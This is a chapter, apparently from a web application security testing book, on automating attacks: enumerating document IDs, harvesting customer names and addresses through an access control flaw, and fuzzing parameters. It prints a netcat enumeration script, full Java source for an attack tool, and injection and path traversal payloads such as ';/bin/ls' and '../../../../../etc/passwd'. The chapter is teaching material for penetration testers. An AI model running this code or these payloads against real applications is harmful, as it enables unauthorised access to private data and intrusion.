The request includes a parameter containing the identifier that you are

targeting. For example, in a function that displays a stored document,

the request might contain the parameter

docID=3801.

■■

The server’s response to this request varies in a systematic way

when you vary the parameter’s value. For example, if a valid

docId is

requested, the server might return a long response containing the speci-

fied document’s contents. If an invalid value is requested, it might

return a short response containing the string

Invalid document ID.

Having located a suitable request/response pair, the basic approach

involves submitting a large number of automated requests to the application,

either working through a list of potential identifiers, or iterating through the

syntactic range of identifiers known to be in use. The application’s responses

to these requests are monitored for “hits,” indicating that a valid identifier was

submitted.

Detecting Hits

There are numerous attributes of responses in which systematic variations

may be detected, and which may therefore provide the basis for an automated

attack.

HTTP Status Code

Many applications return different status codes in a systematic way depend-

ing on the values of submitted parameters. The values that are most com-

monly encountered during an attack to enumerate identifiers are:

■■

200 – The default response code, meaning “ok.”

■■

301 or 302 – A redirection to a different URL.

■■

401 or 403 – The request was not authorized or allowed.

■■

404 – The requested resource was not found.

■■

500 – The server encountered an error when processing the request.

474 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 474

Response Length

It is common for dynamic application pages to construct responses using a

page template (which has a fixed length), and insert per-response content into

this template. If the per-response content does not exist or is invalid (e.g., an

incorrect document ID was requested), the application might simply return an

empty template. In this situation, the response length is a reliable indicator of

whether a valid document ID has been identified.

In other situations, different response lengths may point towards the occur-

rence of an error or the existence of additional functionality. In the authors’

experience, the HTTP status code and response length indicators have been

found to provide a highly reliable means of identifying anomalous responses

in the majority of cases.

Response Body

It is very common for the data actually returned by the application to contain

literal strings or patterns that can be used to detect hits. For example, when an

invalid document ID is requested, the response might contain the string

Invalid document ID. In some cases, where the HTTP response code does not

vary, and the overall response length is changeable due to the inclusion of

dynamic content, searching responses for a specific string or pattern may be

the most reliable means of identifying hits.

Location Header

In some cases, the application will respond to every request for a particular

URL with an HTTP redirect (a 302 status code), where the target of the redirec-

tion depends upon the parameters submitted in the request. For example, a

request to view a report might result in a redirect to

/download.jsp if the sup-

plied report name is correct, or to

/error.jsp if it is incorrect. The target of an

HTTP redirect is specified in the

Location header, and can often be used as a

way of identifying hits.

Set-Cookie Header

Occasionally, the application may respond in an identical way to any set of

parameters, with the exception that a cookie is set in certain cases. For exam-

ple, every login request might be met with the same redirect, but in the case of

valid credentials, the application sets a cookie containing a session token. The

content that the client receives when it follows the redirect will depend on

whether a valid session token is submitted.

Chapter 13 ■ Automating Bespoke Attacks 475

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 475

Time Delays

Occasionally, the actual contents of the server’s response may be identical

when valid and invalid parameters are submitted, but the time taken to return

the response may differ subtly. For example, when an invalid username is sub-

mitted to a login function, the application may respond immediately with a

generic, uninformative message. However, when a valid username is submit-

ted, the application may perform various back-end processing to validate the

supplied credentials, some of which is computationally intensive, before

returning the same message if the credentials are incorrect. If you can detect

this time difference remotely, then it can be used as a discriminator to identify

hits in your attack. (This bug is also often found in other types of software,

such as older versions of OpenSSH.)

TIP The primary objective in selecting indicators of hits is to find one that is

completely reliable or a group that are reliable when taken together. However,

in some attacks, you may not know in advance exactly what a hit looks like. For

example, when targeting a login function to try and enumerate usernames, you

may not actually possess a known valid username in order to determine the

application’s behavior in the case of a hit. In this situation, the best approach is

to monitor the application’s responses for all of the attributes just described

and to look for any anomalies in these.

Scripting the Attack

Let’s suppose that we have identified the following URL, which returns a 200

response code when a valid

docID value is submitted, and a 500 response code

otherwise:

http://wahh-app.com/ShowDoc.jsp?docID=3801

This request/response pair satisfies the two conditions required for you to

be able to mount an automated attack to enumerate valid document IDs.

In a simple case such as this, it is possible to create a custom script very

quickly to perform an automated attack. For example, the following bash

script reads a list of potential document IDs from

stdin, uses the netcat tool

to request a URL containing each ID, and logs the first line of the server’s

response, which contains the HTTP status code:

#!/bin/bash

server=wahh-app.com

port=80

476 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 476

while read id

echo -ne “$id\t”

echo -ne “GET /ShowDoc.jsp?docID=$id HTTP/1.0\r\nHost: $server\r\n\r\n”

| netcat $server $port | head -1

done | tee outputfile

Running this script with a suitable input file generates the following output,

which enables you to quickly identify valid document IDs:

~> ./script <IDs.txt

3000 HTTP/1.0 500 Internal Server Error

3001 HTTP/1.0 200 Ok

3002 HTTP/1.0 200 Ok

3003 HTTP/1.0 500 Internal Server Error

...

TIP The Cygwin environment can be used to execute bash scripts on the

Windows platform. Also, the UnxUtils suite contains Win32 ports of numerous

useful GNU utilities such as head and grep.

You can achieve the same result just as easily in a Windows batch script. The

following example uses the

curl tool to generate requests and the findstr

command to filter the output:

for /f “tokens=1” %i in (IDs.txt) do echo %i && curl

wahh-app.com/ShowDoc.jsp?docId=%i -i -s | findstr /B HTTP/1.0

While simple scripts like these are ideal for performing a straightforward

task like cycling through a list of parameter values and parsing the server’s

response for a single attribute, in many situations you are likely to require

more power and flexibility than command-line scripting can readily offer. The

authors’ preference is to use a suitable high-level object-orientated language

that enables easy manipulation of string-based data and provides accessible

APIs for using sockets and SSL. Languages that satisfy these criteria include

Java, C#, and Python. We will look in more depth at an example using Java.

JAttack

JAttack is a simple but versatile tool that demonstrates how anyone with some

basic programming knowledge can use bespoke automation to deliver very

powerful attacks against an application. The full source code for this tool can

be downloaded from the companion web site (

www.wiley.com/go/webhacker)

to this book. More important than the actual code, however, are the basic tech-

niques involved, which we will explain shortly.

Chapter 13 ■ Automating Bespoke Attacks 477

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 477

Rather than just working with a request as an unstructured block of text, we

need the tool to understand the concept of a request parameter — that is, a

named item of data that can be manipulated and is attached to a request in a

particular way. Request parameters may appear in the URL query string,

HTTP cookies, or the body of a

POST request. Let’s start by creating a Param

class to hold the relevant details:

// JAttack.java

// by Dafydd Stuttard

import java.net.*;

import java.io.*;

class Param

{

String name, value;

Type type;

boolean attack;

Param(String name, String value, Type type, boolean attack)

{

this.name = name;

this.value = value;

this.type = type;

this.attack = attack;

}

enum Type

{

URL, COOKIE, BODY

}

In many situations, a request will contain parameters that we do not wish to

modify in a given attack, but that we still need to include for the attack to suc-

ceed. We can use the “attack” field to flag whether a given parameter is being

subjected to modification in the current attack.

In order to modify the value of a selected parameter in crafted ways, we

need our tool to understand the concept of an attack payload. In different

types of attack, we will need to create different payload sources. Let’s build

some flexibility into the tool up front, and create an interface that all payload

sources must implement:

interface PayloadSource

{

boolean nextPayload();

void reset();

String getPayload();

}

478 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 478

The nextPayload method can be used to advance the state of the source, and

returns

true until all of its payloads are used up. The reset method returns

the state to its initial point. The

getPayload method returns the value of the

current payload.

In the document enumeration example, the parameter we want to vary con-

tains a numeric value, and so our first implementation of the

PayloadSource

interface is a class to generate numeric payloads. This class allows us to spec-

ify the range of numbers which we want to test:

class PSNumbers implements PayloadSource

{

int from, to, step, current;

PSNumbers(int from, int to, int step)

{

this.from = from;

this.to = to;

this.step = step;

reset();

}

public boolean nextPayload()

{

current += step;

return current <= to;

}

public void reset()

{

current = from - step;

}

public String getPayload()

{

return Integer.toString(current);

}

Equipped with the concept of a request parameter and a payload source, we

have sufficient resources to generate actual requests and process the server’s

responses. First, let’s specify some configuration for our first attack:

class JAttack

{

// attack config

String host = “wahh-app.com”;

int port = 80;

String method = “GET”;

String url = “/ShowDoc.jsp”;

Chapter 13 ■ Automating Bespoke Attacks 479

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 479

Param[] params = new Param[]

{

new Param(“DocID”, “3801”, Param.Type.URL, true),

};

PayloadSource payloads = new PSNumbers(3000, 3100, 1);

This configuration includes the basic target information, creates a single

request parameter called

DocID, and configures our numeric payload source to

cycle through the range 3000–3100.

In order to cycle through a series of requests, potentially targeting multiple

parameters, we’ll need to maintain some state. Let’s use a simple

nextRequest

method to advance the state of our request engine, returning true until there

are no more requests remaining:

// attack state

int currentParam = 0;

boolean nextRequest()

{

if (currentParam >= params.length)

return false;

if (!params[currentParam].attack)

{

currentParam++;

return nextRequest();

}

if (!payloads.nextPayload())

{

payloads.reset();

currentParam++;

return nextRequest();

}

return true;

}

This stateful request engine will keep track of which parameter we are cur-

rently targeting, and which attack payload to place into it. The next step is to

actually build a complete HTTP request using this information. This involves

inserting each type of parameter into the correct place in the request, and

adding any other required headers:

480 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 480

String buildRequest()

{

// build parameters

StringBuffer urlParams = new StringBuffer();

StringBuffer cookieParams = new StringBuffer();

StringBuffer bodyParams = new StringBuffer();

for (int i = 0; i < params.length; i++)

{

String value = (i == currentParam) ?

payloads.getPayload() :

params[i].value;

if (params[i].type == Param.Type.URL)

urlParams.append(params[i].name + “=” + value + “&“);

else if (params[i].type == Param.Type.COOKIE)

cookieParams.append(params[i].name + “=” + value + “; “);

else if (params[i].type == Param.Type.BODY)

bodyParams.append(params[i].name + “=” + value + “&“);

}

// build request

StringBuffer req = new StringBuffer();

req.append(method + “ “ + url);

if (urlParams.length() > 0)

req.append(“?” + urlParams.substring(0, urlParams.length() - 1));

req.append(“ HTTP/1.0\r\nHost: “ + host);

if (cookieParams.length() > 0)

req.append(“\r\nCookie: “ + cookieParams.toString());

if (bodyParams.length() > 0)

{

req.append(“\r\nContent-Type: application/x-www-form-urlencoded”);

req.append(“\r\nContent-Length: “ + (bodyParams.length() - 1));

req.append(“\r\n\r\n”);

req.append(bodyParams.substring(0, bodyParams.length() - 1));

}

else req.append(“\r\n\r\n”);

return req.toString();

}

NOTE If you write your own code to generate POST requests, you will need to

include a valid Content-Length header that specifies the actual length of the

HTTP body in each request, as in the preceding code. If an invalid Content-

Length is submitted, most web servers will either truncate the data you submit

or wait indefinitely for more data to be supplied.

Chapter 13 ■ Automating Bespoke Attacks 481

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 481

In order to send our requests, we need to open network connections to the

target web server. Java makes the task of opening a TCP connection, submit-

ting data, and reading the server’s response extremely easy:

String issueRequest(String req) throws UnknownHostException, IOException

{

Socket socket = new Socket(host, port);

OutputStream os = socket.getOutputStream();

os.write(req.getBytes());

os.flush();

BufferedReader br = new BufferedReader(new InputStreamReader(

socket.getInputStream()));

StringBuffer response = new StringBuffer();

String line;

while (null != (line = br.readLine()))

response.append(line);

os.close();

br.close();

return response.toString();

}

Having obtained the server’s response to each request, we need to parse it

to extract the relevant information to enable us to identify hits in our attack.

Let’s start by simply recording two interesting items — the HTTP status code

from the first line of the response and the total length of the response:

String parseResponse(String response)

{

StringBuffer output = new StringBuffer();

output.append(response.split(“\\s+”, 3)[1] + “\t”);

output.append(Integer.toString(response.length()) + “\t”);

return output.toString();

}

Finally, we now have everything in place to launch our attack. We just need

some simple wrapper code to call each of the preceding methods in turn and

print out the results, until all our requests have been made and

nextRequest

returns false:

void doAttack()

{

System.out.println(“param\tpayload\tstatus\tlength”);

String output = null;

482 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 482

while (nextRequest())

{

try

{

output = parseResponse(issueRequest(buildRequest()));

}

catch (Exception e)

{

output = e.toString();

}

System.out.println(params[currentParam].name + “\t” +

payloads.getPayload() + “\t” + output);

}

public static void main(String[] args)

{

new JAttack().doAttack();

}

That’s it! To compile and run this code, you will need to download the Java

SDK and JRE from Sun, and then execute the following:

> javac JAttack.java

> java JAttack

In our example configuration, the tool’s output is:

param payload status length

DocID 3000 500 220

DocID 3001 200 48179

DocID 3002 200 62881

DocID 3003 500 220

...

Assuming a normal network connection and amount of processing power,

JAttack is capable of issuing hundreds of individual requests per minute and

outputting the pertinent details, enabling you to very quickly identify valid

document identifiers for further investigation.

It may appear that the attack just illustrated is no more sophisticated than

the original bash script example, which required only a few lines of code.

However, because of the way JAttack is engineered, it is trivial to modify it to

deliver much more sophisticated attacks, incorporating multiple request para-

meters, a variety of different payload sources, and arbitrarily complex pro-

cessing of responses. In the following sections, we will make some minor

additions to JAttack’s code, which make it considerably more powerful.

Chapter 13 ■ Automating Bespoke Attacks 483

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 483

Harvesting Useful Data

The second main use of bespoke automation when attacking an application is

to extract useful or sensitive data by using specific crafted requests to retrieve

the information one item at a time. This situation most commonly arises when

you have identified an exploitable vulnerability, such as an access control flaw,

that enables you to access an unauthorized resource by specifying an identifier

for it. However, it may also arise when the application is functioning entirely

as intended by its designers. Here are some examples of cases where auto-

mated data harvesting may be useful:

■■

An online retailing application contains a facility for registered cus-

tomers to view their pending orders. However, if you can determine the

order numbers assigned to other customers, then you can view their

order information in just the same way as your own.

■■

A forgotten password function relies upon a user-configurable chal-

lenge. You can submit an arbitrary username and view the associated

challenge. By iterating through a list of enumerated or guessed user-

names, you can obtain a large list of users’ password challenges, to

identify those that are easily guessable.

■■

A workflow application contains a function to display some basic

account information about a given user, including her privilege level

within the application. By iterating through the range of user IDs in

use, you can obtain a listing of all administrative users, which can be

used as the basis for password guessing and other attacks.

The basic approach to using automation to harvest data is essentially simi-

lar to the enumeration of valid identifiers, except that you are now not only

interested in a binary result (i.e., a hit or a miss), but are seeking to extract

some of the content of each response in a usable form.

Consider the following request in an application used by an online retailer,

which displays the details of a specific order, including the personal informa-

tion of the user who made the order:

POST /ShowOrder.jsp HTTP/1.0

Host: wahh-app.com

Cookie: SessionId=21298FE012EEA892981;

Content-Type: application/x-www-form-urlencoded

Content-Length: 37

OrderRef=1003073781&OrderType=retail

Although this application function is accessible only by authenticated users,

there is an access control vulnerability, which means that any user can view the

484 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 484

details of any order. Further, the format used for the OrderRef parameter

appears to be a six-digit date followed by a four-digit number. Assuming that

the last four digits are more-or-less sequential, it should be trivial to predict

other users’ order numbers.

When the details for an order are displayed, the page source contains the

personal data within an HTML table like the following:

<tr>

<td>Name:</td><td>Phill Bellend</td>

</tr>

<tr>

<td>Address:</td><td>52, Throwley Way</td>

</tr>

...

This data could be of huge value to a competitor company or an identity

fraudster. Given the application’s behavior, it is straightforward to mount a

bespoke automated attack to harvest all of the personal customer information

contained within the application.

To do so, let’s make some quick enhancements to the JAttack tool, to enable

it to extract and log specific data from within the server’s responses. First, we

can add to the attack configuration data a list of the strings within the source

code that identify the interesting content we want to extract:

static final String[] extractStrings = new String[]

{

“<td>Name:</td><td>”,

“<td>Address:</td><td>”

};

Second, we can add the following to the parseResponse method, to search

each response for each of the above strings and extract what comes next, up

until the angle bracket that follows it:

for (String extract : extractStrings)

{

int from = response.indexOf(extract);

if (from == -1)

continue;

from += extract.length();

int to = response.indexOf(“<”, from);

if (to == -1)

to = response.length();

output.append(response.subSequence(from, to) + “\t”);

}

Chapter 13 ■ Automating Bespoke Attacks 485

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 485

That is all we need to change within the tool’s actual code. To configure JAt-

tack to target the actual request in which we are interested, we need to update

its attack configuration as follows:

String method = “POST”;

String url = “/ShowOrder.jsp”;

Param[] params = new Param[]

{

new Param(“SessionId”, “21298FE012EEA892981”, Param.Type.COOKIE, false),

new Param(“OrderRef”, “1003073781”, Param.Type.BODY, true),

new Param(“OrderType”, “retail”, Param.Type.BODY, false),

};

PayloadSource payloads = new PSNumbers(1003073700, 1003073800, 1);

This configuration instructs JAttack to make POST requests to the relevant

URL, containing the three required parameters. Only one of these will actually

be modified, using the range of potential order numbers specified.

When we now run JAttack, we obtain the following output:

OrderRef 1003073700 500 300

OrderRef 1003073701 500 300

...

OrderRef 1003073773 500 300

OrderRef 1003073774 200 27489 P Orac 13, Fairyland St

OrderRef 1003073775 200 28991 S Hammad 1, Stews Place

OrderRef 1003073776 200 29430 Adam Matthews Flat 12a, G Community

OrderRef 1003073777 200 28224 Mike Kemp 6, Carshalton Rd

OrderRef 1003073778 200 28171 Martin Murfitt Jn15, South Circular

OrderRef 1003073779 200 27880 D Senior The Old Doss House

OrderRef 1003073780 200 28901 Ian Peters Penthouse Suite

OrderRef 1003073781 200 27388 Phill Bellend 52, Throwley Way

OrderRef 1003073782 500 300

OrderRef 1003073783 500 300

...

As you can see, the attack was successful and captured the personal details

of some customers. It appears that when an invalid order number is submit-

ted, the server encounters an error and a 500 response code is returned. It also

appears that none of the order numbers below 1003073774 were valid. This

suggests that only eight orders have been placed today, and the order numbers

we should target are 0903073773 and below. By writing a quick custom pay-

load source for JAttack, we could generate payloads automatically, using the

scheme employed by the application.

486 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 486

TIP Data output in tab-delimited format can be easily loaded into

spreadsheet software such as Excel for further manipulation or tidying up. In

many situations, the output from a data-harvesting exercise can be used as the

input for another automated attack.

Fuzzing for Common Vulnerabilities

The third main use of bespoke automation does not involve targeting any

known vulnerability to enumerate or extract information. Rather, your objec-

tive is to probe the application with various crafted attack strings designed to

cause anomalous behavior within the application if particular common vul-

nerabilities are present. This type of attack is much less focused than the ones

previously described, for the following reasons:

■■

It generally involves submitting the same set of attack payloads as

every parameter to every page of the application, regardless of the nor-

mal function of each parameter or the type of data that the application

expects to receive. These payloads are sometimes referred to as fuzz

strings.

■■

You do not know in advance precisely how to identify hits. Rather than

monitoring the application’s responses for a specific indicator of suc-

cess, you generally need to capture as much detail as possible in a clear

form, so that this can be easily reviewed to identify cases where your

attack string has triggered some anomalous behavior within the appli-

cation, which merits further investigation.

As you have seen when examining various common web application flaws,

some vulnerabilities manifest themselves in the application’s behavior in par-

ticular recognizable ways, such as a specific error message or HTTP status

code. These vulnerability signatures can sometimes be relied upon to detect

common defects, and they are the means by which automated application vul-

nerability scanners identify the majority of their findings (see Chapter 19).

However, in principle, any test string you submit to the application may give

rise to any expected behavior that, in its particular context, points towards the

presence of a vulnerability. For this reason, an experienced attacker using

bespoke automated techniques is usually much more effective than any fully

automated tool can ever be. Such an attacker can perform an intelligent analy-

sis of every pertinent detail of the application’s responses. He can think like an

application designer and developer. And he can spot and investigate unusual

connections between requests and responses in a way that no current tool is

able to.

Chapter 13 ■ Automating Bespoke Attacks 487

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 487

Using automation to facilitate vulnerability discovery is of particular bene-

fit in a large and complex application containing dozens of dynamic pages,

each of which accepts numerous parameters. Testing every request manually,

and tracking the pertinent details of the application’s responses to related

requests, is a near-impossible task. The only practical way to probe such an

application is to leverage automation to replicate many of the laborious tasks

that you would otherwise need to perform manually.

Consider the following example request, which contains several parameters

of different types:

POST /app/acc/login.jsp?ts=29813&_DARGS=/app/acc/login_assumed.jsp HTTP/1.1

Host: wahh-app.com

Cookie: webabacus_id=131st22418177-1; DYN_USER_ID=100014981;

USER_CONFIRM=836de5f76c5ec83; ParkoSearch2007=true;

JSESSIONID=DKBHCAOQQWHFFCKTR

Content-Length: 160

_dyncharset=UTF-8&_template=app/inc/templ.jsp&personalDetailsURL=..%2Facc%2

Fregister_p1.jsp&[email protected]&originalRedirectFromURL=+&password=

bestinfw

Suppose that we wish to probe this request for common defects within the

application. As an initial exploration of the attack surface, we decide to submit

the following strings in turn within each parameter:

■■

‘ — This will generate an error in some instances of SQL injection.

■■

;/bin/ls — This string will cause unexpected behavior in some cases

of command injection.

■■

../../../../../etc/passwd — This string will cause a different

response in some cases where a path traversal flaw exists.

■■

xsstest — If this string is copied into the server’s response then the

application may be vulnerable to cross-site scripting.

We can extend the JAttack tool to generate these payloads by creating a new

payload source, as follows:

class PSFuzzStrings implements PayloadSource

{

static final String[] fuzzStrings = new String[]

{

“‘“, “;/bin/ls”, “../../../../../etc/passwd”, “xsstest”

};

int current = -1;

public boolean nextPayload()

{

488 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 488

current++;

return current < fuzzStrings.length;

}

public void reset()

{

current = -1;

}

public String getPayload()

{

return fuzzStrings[current];

}

NOTE Any serious attack to probe the application for security flaws would

need to employ many other attack strings, to identify other weaknesses and

also other variations on the defects previously mentioned. See Chapter 20 for a

more comprehensive list of the strings that are effective when fuzzing a web

application.

To use JAttack for fuzzing, we also need to extend its response analysis

code, to provide more information about each response received from the

application. A simple way to greatly enhance this analysis is to search each

response for a number of common strings and error messages that may indi-

cate that some anomalous behavior has occurred, and record any appearance

within the tool’s output.

First, we can add to the attack configuration data a list of the strings that we

want to search for:

static final String[] grepStrings = new String[]

{

“error”, “exception”, “illegal”, “invalid”, “not found”, “xsstest”

};

Second, we can add the following to the parseResponse method, to search

each response for the preceding strings and log any that are found:

for (String grep : grepStrings)

if (response.indexOf(grep) != -1)

output.append(grep + “\t”);

TIP Incorporating this search functionality into JAttack will frequently prove

useful when enumerating identifiers within the application. It is very common to

find that the most reliable indicator of a hit is the presence or absence of a

specific expression within the application’s response.

Chapter 13 ■ Automating Bespoke Attacks 489

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 489

This is all we need to do to create a basic web application fuzzer. To deliver

the actual attack, we simply need to configure JAttack with the relevant

request details, instructing it to attack every parameter, as follows:

String method = “POST”;

String url = “/app/acc/login.jsp”;

Param[] params = new Param[]

{

new Param(“ts”, “29813”, Param.Type.URL, true),

new Param(“_DARGS”,

“/app/acc/login_assumed.jsp”, Param.Type.URL, true),

new Param(“webabacus_id”, “131st22418177-1”, Param.Type.COOKIE, true),

new Param(“DYN_USER_ID”, “100014981”, Param.Type.COOKIE, true),

new Param(“USER_CONFIRM”, “836de5f76c5ec83”, Param.Type.COOKIE, true),

new Param(“ParkoSearch2007”, “true”, Param.Type.COOKIE, true),

new Param(“JSESSIONID”, “DKBHCAOQQWHFFCKTR”, Param.Type.COOKIE, true),

new Param(“_dyncharset”, “UTF-8”, Param.Type.BODY, true),

new Param(“_template”, “app/inc/templ.jsp”, Param.Type.BODY, true),

new Param(“personalDetailsURL”,

“..%2Facc%2Fregister_p1.jsp”, Param.Type.BODY, true),

new Param(“login”, “[email protected]”, Param.Type.BODY, true),

new Param(“originalRedirectFromURL”, “+”, Param.Type.BODY, true),

new Param(“password”, “bestinfw”, Param.Type.URL,BODY),

};

PayloadSource payloads = new PSFuzzStrings();

With this configuration in place, we can launch our attack. Within a few sec-

onds, JAttack has submitted each of the attack payloads within each parame-

ter of the request — over 50 requests in all, which would have taken several

minutes at least to issue manually, and far longer to review and analyze the

raw responses received.

The next task is to manually inspect the output from JAttack and attempt to

identify any anomalous results that may indicate the presence of a vulnerabil-

ity. Let’s take a look at an extract of the output:

_template ‘ 500 498 error not found

_template ;/bin/ls 500 498 error not found

_template ../../../../../etc/passwd 200 3987

_template xsstest 500 498 error not found

personalDetailsURL ‘ 200 39192

personalDetailsURL ;/bin/ls 200 39199

personalDetailsURL ../../../../../etc/passwd 200 39417

personalDetailsURL xsstest 200 39198 xsstest

490 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 490

Starting with the _template parameter, our first request supplied a single

quotation mark, and the server responded with an HTTP 500 error code. We

might immediately suppose that the application is vulnerable to SQL injection.

However, if we look at the other results for this parameter, we can see that an

identical response was received when we supplied other payloads that are not

normally associated with SQL injection. When we supplied a path traversal

string, however, we received a different response: it has a 200 error code, is

considerably longer, and does not contain the strings

error or not found.

Looking back at the original request, we can see that the

_template parameter

takes what appears to be a file path, and so a tentative diagnosis of the

observed behavior would be that the application’s handling of the parameter

is vulnerable to a path traversal bug. We should immediately reissue this test

case manually and review the server’s response in full (see Chapter 10).

The

personalDetailsURL parameter looks less exciting. Each test case

returns a 200 status code with responses that are almost the same length. How-

ever, when we supplied the string

xsstest, this string was copied into the

server’s response. The name of the parameter suggests that this is being used

to transmit a URL via the client, which will be embedded into the next page

returned by the application. This operation may be vulnerable to cross-site

scripting, and we should probe the application’s handling of more crafted

input in order to confirm this (see Chapter 12).

The login parameter is used to submit the username to the login function,

and so submitting attack strings as this parameter should at the very least gen-

erate a failed login. And indeed, we can see that three of the test cases result in

an HTTP redirect containing the string

invalid, which probably appears

within the redirection URL. The fourth test case is much more interesting. Sub-

mitting a single quotation mark as the username resulted in an HTTP 500

response containing the strings

error and illegal. This could indeed be a

SQL injection flaw, and we should manually investigate to confirm this (see

Chapter 9).

Putting It All Together: Burp Intruder

The JAttack tool consists of less than 250 lines of simple code, and yet in a few

seconds, it uncovered at least three potentially serious security vulnerabilities

while fuzzing a single request to an application.

Nevertheless, despite its power, as soon as you start to use a tool like JAttack

to deliver automated bespoke attacks, you will quickly identify additional

Chapter 13 ■ Automating Bespoke Attacks 491

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 491

functionality that would make it even more helpful. As it stands, you need to

configure every targeted request within the tool’s source code and then recom-

pile it. It would be better to read this information from a configuration file and

dynamically construct the attack at runtime. In fact, it would be much better to

have a nice user interface which lets you configure each of the attacks described

in a few seconds.

There are many situations in which you will need more flexibility in the way

that payloads are generated, requiring many more advanced payload sources

than the ones we have created. You will also often need support for SSL, HTTP

authentication, and automatic encoding of unusual characters within payloads.

There are situations in which modifying a single parameter at a time will be too

restrictive — you will want to inject one payload source into one parameter,

and a different source into another. It would be good to store all of the applica-

tion’s responses for easy reference, so that you can immediately inspect an

interesting response to understand what is happening, and even tinker with the

corresponding request manually and reissue it. It would also be nice to inte-

grate the tool with other useful hack tools like a proxy and a spider, avoiding

the need to cut and paste information back and forth.

Burp Intruder is a unique tool that implements all of this functionality. It is

designed specifically to enable you to perform all kinds of bespoke automated

attacks with a minimum of configuration, and to present the results in a rich

amount of detail, enabling you to quickly home in on hits and other anom-

alous test cases. It is also fully integrated with the other Burp Suite tools — for

example, you can trap a request in the proxy, pass this to Intruder to be fuzzed,

and within seconds identify the kind of vulnerabilities described in the previ-

ous example.

We will describe the basic functions and configuration of Burp Intruder and

then look at some examples of it being used to perform bespoke automated

attacks.

Positioning Payloads

Burp Intruder uses a similar conceptual model to JAttack, based on position-

ing payloads at specific points within a request, and one or more payload

sources. However, it is not restricted to inserting payload strings into the val-

ues of the actual request parameters — payloads can be positioned at a sub-

part of a parameter’s value, or at a parameter’s name, or indeed anywhere at

all within the headers or body of a request.

Having identified a particular request to use as the basis for the attack, each

payload position is defined using a pair of markers, to indicate the start and

end of the insertion point for the payload, as shown in Figure 13-1.

492 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 492

Figure 13-1: Positioning payloads

When a payload is inserted at a particular position, any text between the

markers will be overwritten with the payload. When a payload is not being

inserted, the text between the markers will be submitted instead. This is nec-

essary in order to test one parameter at a time, leaving others unmodified, as

when performing application fuzzing. Clicking on the Auto button will make

Intruder set payload positions at the values of all URL, cookie, and body para-

meters, thereby automating a tedious task that was done manually in JAttack.

The sniper attack type is the one you will need most frequently, and func-

tions in the same way as JAttack’s request engine, targeting one payload posi-

tion at a time, submitting all payloads at that position, and then moving on to

the next position. There are other attack types that enable you to target multi-

ple positions simultaneously in different ways, using multiple payload sets.

Choosing Payloads

The next step in preparing an attack is to choose the set of payloads to be

inserted at the defined positions. Intruder contains numerous built-in func-

tions for generating attack payloads, including the following:

■■

Lists of preset and configurable items.

■■

Custom iteration of payloads based on any syntactic scheme. For exam-

ple, if the application uses usernames of the form ABC45D, then the

custom iterator can be used to cycle through the range of all possible

usernames.

Chapter 13 ■ Automating Bespoke Attacks 493

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 493

■■

Character and case substitution. From a starting list of payloads,

Intruder can modify individual characters and their case to generate

variations. This can be useful when brute forcing passwords: for exam-

ple, the string

password can be modified to become p4ssword, passw0rd,

Password, PASSWORD, and so on.

■■

Numbers, which can be used to cycle through document IDs, session

tokens, and so on. Numbers can be created in decimal or hexadecimal,

as integers or fractions, sequentially, in stepped increments, or ran-

domly. Producing random numbers within a defined range can be use-

ful in searching for hits when you have an idea of how large some valid

values are but have not identified any reliable pattern for extrapolating

these.

■■

Dates, which can be used in the same way as numbers in some situa-

tions. For example, if a login form requires entry of date of birth, this

function can be used to brute force all of the valid dates within a speci-

fied range.

■■

Illegal Unicode-encodings, which can be used to bypass some input fil-

ters by submitting alternative encodings of malicious characters.

■■

Character blocks, which can be used to probe for buffer overflow vul-

nerabilities (see Chapter 15).

■■

A brute-forcer function, which can be used to generate all the permuta-

tions of a particular character set in a specific range of lengths. Using

this function is a last resort in most situations because of the huge num-

ber of requests that it generates. For example, brute forcing all possible

six-digit passwords containing only lowercase alphabetical characters

produces more than three million permutations — more than can prac-

tically be tested with only remote access to the application.

Burp Intruder will by default URL-encode any characters that might invali-

date your request if placed into the request in their literal form.

Configuring Response Analysis

Before launching any attack, you should identify the attributes of the server’s

responses that you are interested in analyzing. For example, when enumerat-

ing identifiers, you may need to search each response for a specific string.

When fuzzing, you may wish to scan for a large number of common error mes-

sages and the like.

By default, Burp Intruder records in its table of results the HTTP status code,

the response length, any cookies set by the server, and the time taken to receive

the response. As with JAttack, you can additionally configure Burp Intruder to

494 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 494

perform some custom analysis of the application’s responses to help identify

interesting cases that may indicate the presence of a vulnerability or merit fur-

ther investigation. You can specify strings or regex expressions that responses

will be searched for. You can set customized strings to control extraction of

data from the server’s responses. And you can make Intruder check whether

each response contains the attack payload itself, to help identify cross-site

scripting and other response injection vulnerabilities.

Having configured payload positions, payload sources, and any required

analysis of server responses, you are ready to launch your attack. Let’s take a

quick look at how Intruder can be used to deliver some common bespoke

automated attacks.

Attack 1: Enumerating Identifiers

Suppose that you are targeting an application that supports self-registration

for anonymous users. You create an account and log in, and gain access to a

minimum of functionality. At this stage, one area of obvious interest is the

application’s session tokens. Logging in several times in close succession gen-

erates the following sequence:

